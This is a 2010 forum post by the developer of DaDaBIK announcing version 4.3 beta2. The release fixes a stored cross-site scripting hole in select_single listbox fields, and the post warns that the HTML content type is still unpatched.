DaDaBIK®
Security Risk, PLEASE UPGRADE!
Posted by Eugenio on 11 Nov 2010
Hi all,
last night I discovered an important security hole in DaDaBIK so I decided to immediately release a version 4.3 beta2 with the only purpose of partially fixing it. All the other bug fixes and new features are waiting for the version 4.3 rc1, avaiable in 1 or 2 weeks as expected.
Here is the problem: if in a DaDaBIK application the insert or edit feature was enabled (at least for one table) and a select_single field type was used (at least once, even in another table), a malicious user who had access to the application could in many cases insert in a listbox some arbitrary javascript code, which was then executed by other users just by using the application.
Among other problems, this could lead to XSS attack (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn could allow an unauthorized access to the application (http://en.wikipedia.org/wiki/Session_hijacking) and, if the Internet browser of the user contained security holes, even the execution of arbitrary code in the client machine.
The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected and exploited by a malicious user; now it has been patched.
The problems described above can however occur even when the insert or edit feature was enabled (at least for one table) and the HTML content type is used; at the moment there isn't a patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the upgraded documentation. In the next few days, I would like to use something like http://htmlpurifier.org to allow the users to insert html text without security problems.
The 4.3 beta2 also fixes another minor GUI bug, as you can read from the changelog.
Ciao,